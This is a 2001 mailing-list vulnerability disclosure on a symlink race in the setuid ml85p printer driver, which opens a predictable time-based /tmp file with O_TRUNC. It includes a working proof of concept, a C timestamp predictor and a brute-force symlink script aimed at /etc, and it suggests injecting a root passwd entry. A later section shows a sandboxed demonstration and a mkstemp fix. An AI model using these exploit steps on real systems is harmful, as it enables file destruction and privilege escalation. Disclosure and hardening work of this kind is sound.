From: KF (dotslashsnosoft.com)
Date: Mon Jul 09 2001 - 23:07:20 CDT


    ml85p, the driver for Samsung ML-85G GDI printers, seems to use /tmp insecurely.
    It seems to use the time() function to determine the /tmp file's name.

    [root@linux exp]# strings /usr/bin/ml85p | grep tmp
    /tmp/ml85g%d

    [401070dd] iopl(0x3) = 0
    [400cf2bd] time(NULL) = 994462668
    [40100cbf] brk(0) = 0x8064544
    [40100cbf] brk(0x80646c4) = 0x80646c4
    [40100cbf] brk(0x8065000) = 0x8065000
    [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

    TIME(2) Linux Programmer's Manual TIME(2)

    NAME
           time - get time in seconds

    SYNOPSIS
           #include <time.h>

           time_t time(time_t *t);

    DESCRIPTION
           time returns the time since the Epoch (00:00:00 UTC, January 1, 1970),
           measured in seconds.

    [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666
    [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667
    [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668

    This is trivial... root must run the following command:
    [root@linux exp]# /usr/bin/ml85p -s

    -s simulate the printing process, but write the compressed output to a
           /tmp/ml85xxxxxxxx file, where the filename suffix is the current time in
           time_t units (seconds since 12/31/1970).

    As you can see, this is the one that hits us...
    [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

    Oh how nice, a truncation flag...

    O_TRUNC
           If the file already exists and is a regular file and the open mode
           allows writing (i.e., is O_RDWR or O_WRONLY) it will be truncated to
           length 0.

    [root@linux exp]# ls -al /tmp | grep ml
    -rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462665
    lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462666 -> /etc/test
    lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462667 -> /etc/test
    lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462668 -> /etc/test
    -rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462669
    -rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462670

    [d0tslash@linux d0tslash]$ ls -al /etc/test
    -rw-r--r-- 1 root root 0 Jul 6 19:37 /etc/test

    I am not sure what other OSes pick for permissions by default...
    Mandrake seems to not allow user access by default... I don't know
    what group you need to have access to in order to use this feature.

    [d0tslash@linux d0tslash]$ /usr/bin/ml85p
    bash: /usr/bin/ml85p: Permission denied

    [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
    -rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p*

    For shits and giggles, let's see what happens if it's got bad perms.
    [root@linux exp]# chmod 4755 /usr/bin/ml85p

    In which case the results are as follows:

    [d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
    -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463605
    -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463607
    -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463608
    -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463609

    [d0tslash@linux d0tslash]$ cat ml85p-exp.c
    // ln -s /etc/oops /tmp/ml85g`./ml85p-exp`

    #include <time.h>
    #include <stdio.h>

    /* Print the time_t value 30 seconds from now, i.e. the suffix ml85p
     * will use for its /tmp file if it is run within that window. */
    int main(int argc, char **argv)
    {
        time_t x = time(NULL);
        x = x + 30;
        printf("%ld\n", (long)x);
        return 0;
    }

    [d0tslash@linux d0tslash]$ cat ml85p.sh
    #!/bin/bash
    # krfinisterrecheckfree.com
    echo "brute.sh <low> <hi>"
    L=$1
    H=$2
    while [ $L -lt $H ]
    do
            ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
            let L=L+1
    done

    The following file is created:
    -rw-r--r-- 1 root d0tslash 0 Jul 6 20:18 /etc/oops

    Not sure what use this is short of clobbering files... Since the output is sent to this file, it may be possible to print
    owned::0:0:root:/root:/bin/bash to this driver and it may append it to the file in /tmp... I am not sure though... just an idea.
    -KF
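The root cause the post walks through (a predictable time()-based name opened with O_CREAT|O_TRUNC and no O_EXCL, so a pre-planted symlink is followed and its target truncated) shown beside the hardened replacement, as an added example that is not part of the original post or of the ml85p driver. The open_spool_* routines are a reconstruction of the pattern, not the driver's source, and the sandbox directory, "victim" file and symlink are constructed for the demonstration.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the post describes (a reconstruction, not the driver's source):
 * predictable name, O_CREAT without O_EXCL, O_TRUNC. open(2) follows a symlink
 * planted at that name, so whatever the link points at gets truncated. */
int open_spool_predictable(const char *dir, long stamp) {
    char path[4096];
    snprintf(path, sizeof path, "%s/ml85g%ld", dir, stamp);
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0666);
}
/* Hardened replacement: mkstemp(3) fills in an unpredictable suffix and opens
 * with O_CREAT|O_EXCL and mode 0600, so it never follows or reuses an existing
 * entry and never truncates anything. */
int open_spool_safe(const char *dir, char *path, size_t len) {
    snprintf(path, len, "%s/ml85gXXXXXX", dir);
    return mkstemp(path);
}
/* Constructed scenario in a private sandbox: a 6-byte "victim" file and a
 * symlink named ml85g994462668 (the time() value from the post's ltrace
 * output) pointing at it, standing in for the planted /tmp links. */
static int setup(char *dir, char *victim, char *link) {
    snprintf(dir, 4096, "/tmp/ml85demoXXXXXX");
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, 4096, "%s/victim", dir);
    snprintf(link, 4096, "%s/ml85g%ld", dir, 994462668L);
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "secret", 6) != 6 || close(fd)) return -1;
    return symlink(victim, link);
}
static long size_of(const char *p) {
    struct stat st;
    return stat(p, &st) ? -1 : (long)st.st_size;
}
/* Victim's size after one open routine runs against the planted link;
 * cleans the sandbox up afterwards. */
long victim_size_after(int safe) {
    char dir[4096], victim[4096], link[4096], out[4096] = "";
    if (setup(dir, victim, link)) return -1;
    int fd = safe ? open_spool_safe(dir, out, sizeof out)
                  : open_spool_predictable(dir, 994462668L);
    if (fd >= 0) close(fd);
    long size = size_of(victim); /* predictable: 0 (clobbered); safe: 6 */
    unlink(link); unlink(victim); if (*out) unlink(out); rmdir(dir);
    return size;
}
```

Calling victim_size_after(0) reproduces the clobbering from the post inside the sandbox, while victim_size_after(1) leaves the target intact; the same O_EXCL-based approach applies to any privileged program writing into a world-writable directory.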